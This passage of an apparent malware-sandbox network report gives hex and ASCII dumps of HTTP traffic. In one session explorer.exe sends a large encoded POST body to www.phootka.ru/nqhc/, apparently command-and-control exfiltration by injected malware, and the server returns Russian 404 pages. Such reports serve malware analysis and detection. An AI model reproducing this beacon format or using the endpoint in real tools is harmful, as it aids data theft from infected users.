                                                                                                                                                                                    Data Ascii: een; } .logo { padding: 30px 40px; } .content { display: flex; justify-content: space-between; margin: 0 82px; } .left { display: fl
                                                                                                                                                                                    Nov 21, 2022 19:22:57.702541113 CET1330INData Raw: 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                                                                                                                                    Data Ascii: : 15px; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0 100 42" fill="none" xmlns="http://www.w3.org/2
                                                                                                                                                                                    Nov 21, 2022 19:22:57.702594995 CET1332INData Raw: 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 33 2e 31 35 30 39 20 31 34 2e 31 37 38 38 43 35 33 2e
                                                                                                                                                                                    Data Ascii: 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556 12.7287 52.7556 12.47C52.455 12.211 52.0227
                                                                                                                                                                                    Nov 21, 2022 19:22:57.747051001 CET1333INData Raw: 36 34 30 35 20 31 30 2e 30 34 39 34 43 36 35 2e 39 36 37 38 20 31 30 2e 30 34 39 34 20 36 35 2e 33 35 32 31 20 31 30 2e 31 37 35 37 20 36 34 2e 37 39 32 20 31 30 2e 34 32 35 37 43 36 34 2e 32 33 31 37 20 31 30 2e 36 37 37 39 20 36 33 2e 36 31 33
                                                                                                                                                                                    Data Ascii: 6405 10.0494C65.9678 10.0494 65.3521 10.1757 64.792 10.4257C64.2317 10.6779 63.6136 11.0274 62.9346 11.475L63.2065 10.3343L58.7385 10.3351L58.2337 12.5144H59.3852L57.5098 20.6619H60.8287L62.5044 13.3418C62.9323 13.1149 63.3172 12.9453 63.6601


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    49192.168.11.2049874195.24.68.2380C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:22:59.718462944 CET1369OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.phootka.ru
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.phootka.ru
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.phootka.ru/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 71 7a 73 4a 57 71 35 6b 67 56 6c 4e 75 55 39 7a 55 71 57 72 34 4d 51 66 33 33 46 69 79 35 32 59 5a 69 79 4f 42 75 70 61 78 67 75 67 68 56 4a 36 6e 5a 64 4e 62 37 76 47 7a 48 67 62 55 64 56 6b 78 55 4d 58 38 46 77 49 73 6a 79 54 6b 45 72 53 6f 72 71 37 34 38 79 39 37 62 64 38 35 6c 6e 64 49 5a 28 79 4f 75 53 54 37 76 7a 38 53 31 51 53 55 30 7a 63 54 5f 74 30 41 6e 42 74 69 6c 62 39 6e 53 62 38 39 57 76 78 34 30 55 36 4f 5a 50 35 4d 52 78 73 4f 4e 63 30 49 72 31 69 44 59 37 68 6b 6b 50 70 56 55 76 79 41 36 54 73 6e 6a 6d 72 4d 6b 44 4e 78 54 56 71 62 67 43 37 54 75 44 61 66 71 48 7a 78 31 73 53 41 72 51 56 43 73 53 36 36 67 53 4a 6d 62 76 63 62 34 32 51 38 35 53 69 44 77 4a 79 5a 30 69 53 79 75 6a 32 65 46 78 4d 56 41 50 5a 7a 49 44 6d 43 5a 45 4b 45 63 6b 4f 76 32 49 68 57 33 79 31 53 6d 45 77 54 30 72 4a 44 7a 37 7a 68 65 50 50 68 68 4d 49 30 48 4a 79 67 49 55 70 62 67 4c 58 6a 58 4b 33 42 45 6b 61 43 75 61 58 79 53 39 53 6c 58 45 50 28 4a 41 6a 43 5a 48 6b 34 48 73 32 66 42 7e 66 54 7a 78 59 7a 70 58 32 43 45 63 46 59 6d 35 47 71 6e 41 70 33 58 65 69 45 56 71 36 72 5f 4a 52 59 53 56 62 43 64 4a 71 77 76 59 55 39 70 5a 63 4f 62 57 55 43 33 51 6b 33 4d 6b 56 62 76 35 73 47 65 78 4a 42 38 52 61 56 76 79 50 46 5f 57 51 28 39 6f 77 49 35 4f 6e 6d 79 67 50 63 37 54 6c 44 45 79 4d 41 51 62 4d 46 61 75 76 74 6e 56 67 52 78 38 56 4a 64 6e 50 6d 55 38 6f 75 33 4e 51 69 67 37 6f 53 58 73 5f 69 77 39 68 6a 69 32 52 4d 79 6f 44 73 77 31 6c 7a 46 73 62 43 30 49 45 43 59 72 66 48 69 59 67 31 35 49 64 42 46 42 64 45 46 78 72 66 4e 50 35 65 71 7e 66 4c 61 43 6b 43 65 69 48 68 6d 37 44 38 6f 4d 73 49 34 4a 6a 7a 6a 42 71 67 5f 53 72 6e 48 7a 4a 52 6b 6f 63 5a 58 4b 4f 47 4c 73 73 30 51 44 4c 67 44 30 34 6b 65 6c 4d 7e 4c 6e 72 68 57 71 44 39 31 43 67 70 45 75 4e 65 70 78 76 56 71 59 46 62 44 32 59 43 6c 4a 4b 5a 68 71 56 66 46 39 51 46 45 53 39 46 4d 58 42 55 64 42 5a 6f 6a 47 4a 34 47 79 6e 54 5a 31 33 69 37 76 6d 59 6f 69 65 6b 4b 53 53 58 4d 41 52 37 32 39 2d 68 73 71 57 58 64 38 48 41 6b 33 77 57 5f 68 33 4a 4f 6e 70 47 5a 33 52 45 72 47 4c 57 55 72 64 74 5f 49 34 41 52 51 34 54 46 54 57 4f 31 32 34 33 4b 35 52 71 74 71 76 33 5f 46 78 71 56 59 46 33 39 64 6c 64 69 6a 65 54 70 39 79 66 37 4e 34 48 65 41 64 52 71 64 35 37 69 31 71 65 53 31 6f 33 37 4f 30 4d 58 58 77 62 58 56 5a 74 50 77 47 73 68 48 6f 66 6a 61 68 6e 79 59 4b 55 74 73 4f 6e 64 59 53 64 6e 43 70 64 72 57 66 4b 4d 70 34 6d 62 76 2d 61 4b 28 31 63 6f 46 39 59 7a 61 33 4e 46 4e 5a 72 69 44 38 6f 73 61 31 31 4e 33 30 6d 30 56 56 32 41 58 6e 4d 30 6e 32 79 72 4f 34 49 37 61 76 35 34 57 6f 56 5f 46 54 74 33 4f 35 6f 7a 44 7a 70 4b 66 35 59 6d 46 75 77 55 69 70 7e 6c 74 51 7e 2d 35 68 33 43 75 73 4b 6c 31 79 78 37 5a 77 31 31 4b 58 6e 4f 78 4d 30 77 49 59 76 53 54 62 39 45 54 76 47 72 52 6e 52 4e 61 76 46 31 68 71 35 4e 4f 78 78 49 37 62 74 4a 66 54 41 6a 6c 73 54 61 76 4d 79 72 35 41 43 33 71 68 55 51 75 4d 38 6e 74 34 61 6e 62 62 54 4a 7e 73 33 78 35 4d 61 66 62 7a 31 4f 72 55 64 4d 7e 53 38 57 62 52 54 48 59 46 4b 64 7e 69 6e 7a 66 5a 6b 37 4f 44 64 48 66 7a 39 32 69 45 39 61 73 4d 4a 51 79 44 44 57 68 4c 4e 75 42 33 79 6b 55 53 7e 66 79 4c 48 4a 5a 7a 55 61 31 43 45 36 32 79 4a 42 6f 54 64 7a 51 46 35 48 73 48 54 35 61 6c 4d 51 38 6b 41 62 47 78 44 32 34 56 47 6d 42 4c 4c 7a 78 70 37 71 54 52 42 6f 37 52 73 64 78 37 73 62 55 41 31 30 73 78 31 52 4b 78 53 78 52 6d 65 5a 4c 4a 51 47 66 79 55 56 52 70 38 6e 49 6f 50 35 6c 6b 47 6d 68 4c 56 68 65 48 4d 66 73 5a 50 70 71 76 75 74 52 56 32 4f 39 37 6a 58 4e 72 53 44 28 34 72 47 4c 6b 46 31 62 5a 6b 4e 4f 4e 61 44 69 69 5a 68 72 38 6a 6c 76 62 51 43 37 69 75 69 48 77 54 74 7e 56 52 69 59 55 37 7a 48 6f 63 44 33 2d 56 33 69 32 71 6f 50 46 57 68 54 59 41 6d 7e 72 4b 6e 56 53 45 6e 6a 4d 31 44 70 76 39 6b 57 6b 32 50 50 4c 65 41 67 35 62 4a 51 63 4e 6b 6f 46 48 2d 43 43 44 6b 78 4c 55 75 55 35 41 44 62 6e 37 51 42 4f 57 31 78 6c 34 42 4d 65 54 32 6c 6e 41 41 43 32 6f 4b 51 63 30 39 38 45 44 54 63 39 42 62 4e 4f 6b 41 63 32 48 70 7a 31 53 4a 46 76 71 33 77 5a 61 48 75 52 58 47 72 63 45 6a 74 4c 6a 71 64 58 35
                                                                                                                                                                                    Data Ascii: r4txB=qzsJWq5kgVlNuU9zUqWr4MQf33Fiy52YZiyOBupaxgughVJ6nZdNb7vGzHgbUdVkxUMX8FwIsjyTkErSorq748y97bd85lndIZ(yOuST7vz8S1QSU0zcT_t0AnBtilb9nSb89Wvx40U6OZP5MRxsONc0Ir1iDY7hkkPpVUvyA6TsnjmrMkDNxTVqbgC7TuDafqHzx1sSArQVCsS66gSJmbvcb42Q85SiDwJyZ0iSyuj2eFxMVAPZzIDmCZEKEckOv2IhW3y1SmEwT0rJDz7zhePPhhMI0HJygIUpbgLXjXK3BEkaCuaXyS9SlXEP(JAjCZHk4Hs2fB~fTzxYzpX2CEcFYm5GqnAp3XeiEVq6r_JRYSVbCdJqwvYU9pZcObWUC3Qk3MkVbv5sGexJB8RaVvyPF_WQ(9owI5OnmygPc7TlDEyMAQbMFauvtnVgRx8VJdnPmU8ou3NQig7oSXs_iw9hji2RMyoDsw1lzFsbC0IECYrfHiYg15IdBFBdEFxrfNP5eq~fLaCkCeiHhm7D8oMsI4JjzjBqg_SrnHzJRkocZXKOGLss0QDLgD04kelM~LnrhWqD91CgpEuNepxvVqYFbD2YClJKZhqVfF9QFES9FMXBUdBZojGJ4GynTZ13i7vmYoiekKSSXMAR729-hsqWXd8HAk3wW_h3JOnpGZ3RErGLWUrdt_I4ARQ4TFTWO1243K5Rqtqv3_FxqVYF39dldijeTp9yf7N4HeAdRqd57i1qeS1o37O0MXXwbXVZtPwGshHofjahnyYKUtsOndYSdnCpdrWfKMp4mbv-aK(1coF9Yza3NFNZriD8osa11N30m0VV2AXnM0n2yrO4I7av54WoV_FTt3O5ozDzpKf5YmFuwUip~ltQ~-5h3CusKl1yx7Zw11KXnOxM0wIYvSTb9ETvGrRnRNavF1hq5NOxxI7btJfTAjlsTavMyr5AC3qhUQuM8nt4anbbTJ~s3x5Mafbz1OrUdM~S8WbRTHYFKd~inzfZk7ODdHfz92iE9asMJQyDDWhLNuB3ykUS~fyLHJZzUa1CE62yJBoTdzQF5HsHT5alMQ8kAbGxD24VGmBLLzxp7qTRBo7Rsdx7sbUA10sx1RKxSxRmeZLJQGfyUVRp8nIoP5lkGmhLVheHMfsZPpqvutRV2O97jXNrSD(4rGLkF1bZkNONaDiiZhr8jlvbQC7iuiHwTt~VRiYU7zHocD3-V3i2qoPFWhTYAm~rKnVSEnjM1Dpv9kWk2PPLeAg5bJQcNkoFH-CCDkxLUuU5ADbn7QBOW1xl4BMeT2lnAAC2oKQc098EDTc9BbNOkAc2Hpz1SJFvq3wZaHuRXGrcEjtLjqdX5A(Dm1RxiWDliVAFs_Mb1AmyNRflgp1T4Pv9bQ8xtyXvWqbOOu5j4V3FEPu61Z6ALC0OkhdgC8Re8CvtZSfI8VQ7Rem3y5aKyG2IYuoMn-L0x9zQlq2BJQAoLlGmfGDtFgZH7o226XqIMzSTQU52M_MBAZ1XDM6JX7ZiZhC3MV2uxFVByoxyd9of6gnG8eEU~jDdvszaCjCZo0VSVwwjdKIO3T(jDcTErcshGNbVjUAmJHMWv6dd4ORhlRuuoN1eLPlc(WGoeeIfxqN9HNFEqOU5oT00e48s01N47WKVg8gjlHIkxEV4Fj1PKoqA2zIAIHDZbE0LTumwcW73ytPn3De-HrJ1JBU3rsygqzlt1n8vcAp3dPAy1TpouAXptWx2Mu2SOhrg~9mwQyG9Ba2EzKWpkBVWiEvGreVG8u7_YV6KBgq3NTf13eikNMVZc7qWDvM-3V091K(CScjlL51AqsxmjTZ2ylX5gW6ERL6dLjJKDPtjgLdHHxw0DJ44k3goeNk8hc~AHRWUXhmpkPY3ooKTVrl6KwUyG9FWiKXAVl5r~ou3lSUiYsmc(LR5GXyQVOJPbXv0NX5AyNWqDjfjsu(h(iuV62oZ4bVUYuBqZlMV~1reg04Q82cvAU~XY6op04IofonFe9jB4VLomxQDkhZhriUoAkt2RfvmThPYCLfh7RpAHxfn06pVHo6bGGtuH7eDCHkQSv13r99BYR7vS0wMjmKx6bsyb2VDYoYDcB0Z8TuzinyJmBzG8W~vZQRk7mTuWsLXSeIoiibnF3lpGuwzt2Qgc1cWs98aLohCjZD0O7fw(ehFlSVG9EKqoKhrEo6wiCA_gF3xlS5lB0rDc5S-ffnb2zGG(6GdcVjRiy8Y44o1FceLz7l5nBkhrBhC(tZyImgi7P(zEAMh6pJgYJ8ufv1kz7wJ(GMtpQuP0nGL9mbAph7ZSHIpCg7aTQ(MeXD61ke5kZRiQ8yeygUfsr0Oeo8rBn5pRN30UX84fJwEi5MpF2sIh70-zt4EKR66YDB7gQl-Rd2ZMeQamY5KEOLcmkpdrjO1eit7N7y2t0Z8o6Zzf_pI9YwIlkGnmDoA6ei88dYDlEQv9sCtrLim1OznZDLaOP5If74FESfSvNqu2gX7OH3G1MMkeNFHQ2pHzPG44eW2GnwfhtUngR9EnJJNtM(QTq80KOg7nxT828ymEo7LGFxDMzitqefDA-ovr-CFu23f1GWzUmJob4pHP2vyYYnz0TDBJY6vbi2SjCMNhj7z3IJsGZBXvOha3geDgSSLVk08QYl2402w9jx5(NbD5Vy08ztVgp~L0ztBZl4MdcOGxsISfbDblpFH9hcA(NOyC65GcYSnCjaaqjP3ubxhUt~FiHxNlB~X4OkcrAR5rFzUMluKm30_fGzgE0x4yi7ldG~v1LZvlwtBKS3acZSMKrora1UGv4FE~RU668sNrNimo53G31sXeUxyd4Y_NYteHuaA0GxXP39mHkOx5x7gpsznfr0LCqHmfmrNKYKM4h9rhK6HN95LR1fp1Dn9IA3Vz76fq0pavPG4sWSYhsrejt3b1OeweaUEKVgeJrK96UoTbF03RIq1wnxJEC3RXfYE3fLr8o4h3dIS0T2QXVwRmnbcYBbfN1qaJxNhz4fPrnsam38OQomI40vteHegLpokx33yllWKLk4QVnnn6tJXbLKMm07JedwVUHVbqzurQ3LVhpL5TgSzKJXU8_xEj523~bqli4denbQZP18hulLqsYzkUF4htLzLp8r-S_yJYmUCRJUf6HAO0lD8st~RIJ8NyE420YMjA4J8~Qry~kDMJJ5qkMgzVsVQqXgxohw0w8puMOWsVqqm6ZxtIsghdCJ93cFNrB0PsiDYuFR2Ohz04_xUpA30McS0zSXZO7mk5oqeU9QzOABQODPILzcRlUrSPlon5kshoSEobb(yU2wUAyswTPrUkFNhf8T-IaLRBiDVP8z2ESivzSQFbgEBPjVe0eiCBsz90bNEYOZIDguFm8LoelYV7MPdy7wP189lmnMESTemIwc0RQ37K91dv9pkeiT9ID0URxEcNPWpfPeu77AeQbJw7zmTakoZ8AgKe3h4HYisTlCYcPOuuzfE2jeJIdTyMAw1g-2m30ysKmhgoa71w4m8wxIe8yLCr7xolBHm6HkudXQ6olPCc9z43h3xfOqf(ieJBO5u~-0Tq9QK3dFt~dy4grV-reYn~oswlrS_6W4EQHQSfKnRbpZuvGnkBL36ahQWTt~QRdCjmikwmLjfvIYG7LDqRRhmyrddmafcaqS6UlrD44rmPYtTrcA-d7KfQ42O0Dplf-VwPRZRGcmGky2wxGtjuHNbP7BU58AfzGB2hYQGtY8127Qh871X63g7fvajFmYf2uC0CvYmyQZ8lgXN3gPDr5Xt0JZRXdR7OBlInnXDFj19lStoWJDNChE9e7yz7uB4MNXCChmUu2ufxt0cB1991b5MPc6s1YiDT-gMT119R2WcIVA_1paWgyIsfQjN1XYLWLxdUD5n3U9FNFA7mZiqADM8zYrl(hIdw3kPze4S01omIxF2FTP5Gqlg4R~N6L~H82WUX3d1c8NL1_5a7gUC5zT7JKMFXz(PpBOC(Di546YPo5cNCzn9SautHmnKO1z6ErauLxmjYSffQnuxc5CwjP1Ky6SzAmayFO81(uU3aXMqNW~xrfHUfyb6169MHQ7vNBhAJatLnA13hAsUHVrX
                                                                                                                                                                                    Nov 21, 2022 19:22:59.718485117 CET1373OUTData Raw: 56 50 43 7a 64 34 31 71 52 71 72 31 4a 70 30 5a 4d 7a 58 44 6d 73 59 72 57 76 53 62 28 39 35 69 41 43 38 46 64 35 72 6a 51 59 53 43 53 64 48 41 49 6d 6c 5f 32 45 36 55 76 45 71 46 30 65 52 73 61 5a 43 4f 6f 55 43 70 4e 43 53 57 59 7a 56 4a 6a 53
                                                                                                                                                                                    Data Ascii: VPCzd41qRqr1Jp0ZMzXDmsYrWvSb(95iAC8Fd5rjQYSCSdHAIml_2E6UvEqF0eRsaZCOoUCpNCSWYzVJjSHsOn2FSsznX9bLffN4RV2t3HCOIQdU(oh8V011GJ(djLxaDLRd65MLfrtYQ8ZO(ieAOJM1CYs5tg68OIRkXrpdyfaHAJftECmqllUWY-2CUNyf6jUyUWJBu0wPuMHP3d4xJW3H1HKB8v~A7Vls4gVAf_gLK1g5kRO
                                                                                                                                                                                    Nov 21, 2022 19:22:59.764189959 CET1378OUTData Raw: 6d 79 64 36 5a 39 45 6c 28 62 6f 2d 76 46 4e 4d 6b 44 46 37 78 4e 72 73 4a 32 48 68 4c 5a 79 39 64 71 62 48 64 39 6a 7a 37 50 31 36 78 71 4e 43 48 53 55 5a 67 59 48 56 64 43 6a 50 50 6f 52 79 6d 66 69 71 46 75 62 50 7e 39 38 30 77 78 48 4c 77 2d
                                                                                                                                                                                    Data Ascii: myd6Z9El(bo-vFNMkDF7xNrsJ2HhLZy9dqbHd9jz7P16xqNCHSUZgYHVdCjPPoRymfiqFubP~980wxHLw-eAwk~7xnWZaSSnvSWrbCPt(PLBTHXDWmBu~0nwNFvJ2yxUdGx8p13OjCkd0AEdkY5C(AKYDKQ291jvmHabCRbt3Fdlneoq(ylV9e~HTa~c6UrZwR1ZS3GBpS9sv6PG8z6b4yJussYl6KSBJAyIqNSsWDYVcbu7Bpt
                                                                                                                                                                                    Nov 21, 2022 19:22:59.764267921 CET1381OUTData Raw: 36 4b 4d 78 6e 6b 68 53 7a 61 68 73 58 33 62 5f 34 52 7a 33 32 4e 39 4c 50 76 38 44 42 55 45 4c 5a 69 35 4b 4c 46 4b 47 79 67 7a 51 63 53 4b 47 32 63 43 6d 75 44 42 4d 31 4b 6d 34 42 41 7a 73 69 66 43 73 79 61 71 68 52 5a 6e 62 54 57 4b 73 44 70
                                                                                                                                                                                    Data Ascii: 6KMxnkhSzahsX3b_4Rz32N9LPv8DBUELZi5KLFKGygzQcSKG2cCmuDBM1Km4BAzsifCsyaqhRZnbTWKsDpTpvMORvWTFVNCZN7wvgduPbuO0LLsfkZg7m2snGO5fYnapb6rtfE6kLqKUnxdcO7K4BwTQFB0dXUQpR2q6hCvLftaSNuGN9aUeg88GpMmcJsbFlqL54wpn6moUn5VJqujbdJ7mktJfnjFSLJreqWq6CaQnmDkg4CS
                                                                                                                                                                                    Nov 21, 2022 19:22:59.764475107 CET1383OUTData Raw: 4b 5f 6d 54 64 76 52 44 68 73 39 67 70 45 33 53 75 57 37 59 63 36 58 36 31 65 6a 48 5a 67 38 62 4c 51 7e 47 52 71 37 44 32 66 6c 6b 6b 69 46 34 6c 71 63 41 6e 57 7a 43 37 55 50 6d 4e 78 59 44 42 46 4c 4c 6d 72 39 39 58 6a 30 34 69 7a 4b 70 42 4c
                                                                                                                                                                                    Data Ascii: K_mTdvRDhs9gpE3SuW7Yc6X61ejHZg8bLQ~GRq7D2flkkiF4lqcAnWzC7UPmNxYDBFLLmr99Xj04izKpBLsaUvf3eySjA2Q3F8YneeCF5ayb(Eh04KMjmdKdW5lEY4Mpac3HGRAIjMId2GQ3wZO-lDwPbDzDO0KyWXlNKqROPzo_(CD4FNztr4QmCtxTUctAezpLnWfRPbiKsqmBf92ZIbqibd0H32oP3DQIFKJsceuDaAVMxje
                                                                                                                                                                                    Nov 21, 2022 19:22:59.764657974 CET1398OUTData Raw: 41 34 66 52 7a 45 78 47 4d 77 4d 6d 48 37 59 50 4b 32 58 59 33 4d 77 61 54 54 68 50 52 38 79 35 64 67 4e 47 4e 76 78 4f 62 75 61 78 52 45 48 66 46 31 41 6b 35 44 53 35 7a 64 38 4a 70 56 7a 37 6c 5f 6d 38 64 76 53 54 28 6b 42 68 78 43 33 41 28 67
                                                                                                                                                                                    Data Ascii: A4fRzExGMwMmH7YPK2XY3MwaTThPR8y5dgNGNvxObuaxREHfF1Ak5DS5zd8JpVz7l_m8dvST(kBhxC3A(gxzxdBz7s66ug15ADy_eutl2biceH(fcIO7(aLn0dIB8_iMKxuthEwArYBkGaMpIOSalO8Murpogha33LJjUvQZZ4XAjXNR9OYSNn0F7yDZxVzpCFn5kOUJJV8BYc5EjRz70XaJYzqNlxnL4NADMV98KG1hO3iit09
                                                                                                                                                                                    Nov 21, 2022 19:22:59.810089111 CET1401OUTData Raw: 6f 33 62 59 28 78 7e 30 37 6d 64 51 53 50 52 65 4e 6b 52 31 67 46 4d 48 67 59 50 2d 4a 55 75 76 56 4d 74 68 42 45 72 71 61 4d 39 4c 55 69 73 5a 65 39 4b 33 76 5f 49 54 4d 77 70 37 52 65 48 37 79 55 7a 54 6b 33 4d 39 4c 31 6f 76 64 49 72 6f 64 43
                                                                                                                                                                                    Data Ascii: o3bY(x~07mdQSPReNkR1gFMHgYP-JUuvVMthBErqaM9LUisZe9K3v_ITMwp7ReH7yUzTk3M9L1ovdIrodCHgx82sxdrlKn3Op5BqofNJFvlWBwH7AqQAvao3Sn(uD8b0MfpNNy8G5vO9(MGlVsyL4GGgJiafDy6RbKuJHh8wF1ieKR9R2WeXXc5LUrvcnAWdpEBpDZKkHSYNrsJVffycIKIN3eFz0EYM53lcAt7vK9zeGhe1JoU
                                                                                                                                                                                    Nov 21, 2022 19:22:59.810173035 CET1406OUTData Raw: 57 52 44 41 4d 49 38 34 50 66 55 71 45 55 4d 31 5a 34 6a 31 57 78 57 4b 78 34 50 41 74 75 48 62 67 32 67 67 4b 47 68 6e 62 59 34 53 6b 42 70 6b 76 34 63 63 43 4f 35 5f 36 6b 43 74 34 76 37 6c 47 65 32 41 47 55 41 46 63 61 65 57 6d 4f 59 6f 35 36
                                                                                                                                                                                    Data Ascii: WRDAMI84PfUqEUM1Z4j1WxWKx4PAtuHbg2ggKGhnbY4SkBpkv4ccCO5_6kCt4v7lGe2AGUAFcaeWmOYo56MKdbDEGuTTPUXQaH1TccrUj0adNmqFeaT5h2gyZKLc6_BayqtWHd5r~AONSIk5D-7aPMKfQzRXyTnEzh5LuKC-2Ukr0XKlYHorGmWmXlna18aDb5ucSMQOMU0c(LaGQDj0xsH6Zl2iSfsat6aA4v6CN8OZW_8tYkx
                                                                                                                                                                                    Nov 21, 2022 19:22:59.810406923 CET1412OUTData Raw: 6e 64 6c 74 66 51 36 77 5a 6b 37 77 66 45 74 4e 63 6e 6d 54 50 61 74 79 7a 38 4c 68 74 66 39 46 6f 6c 55 2d 71 5a 62 62 79 39 58 51 6d 43 6c 39 4e 4d 78 36 76 45 74 75 68 58 33 47 78 6c 35 59 75 74 38 38 65 5f 4f 47 78 35 30 54 65 2d 45 53 59 77
                                                                                                                                                                                    Data Ascii: ndltfQ6wZk7wfEtNcnmTPatyz8Lhtf9FolU-qZbby9XQmCl9NMx6vEtuhX3Gxl5Yut88e_OGx50Te-ESYwAZhESpenFNDzV0hUU0ojmt03kXbZ33SYEeZVuJTT4GFIwUYpfyhE32DP1BT16VhY5pW5ZNA7IrJ8pCWUP38SZcOQt91zmvA76W56YJV_nvX-e8m5ecULTjGY~HurqGuSeFPa2-mmD17-BN(wCAIgVWvy5e7ij9Zm5
                                                                                                                                                                                    Nov 21, 2022 19:22:59.859210014 CET1414INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:22:59 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Content-Length: 39481
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 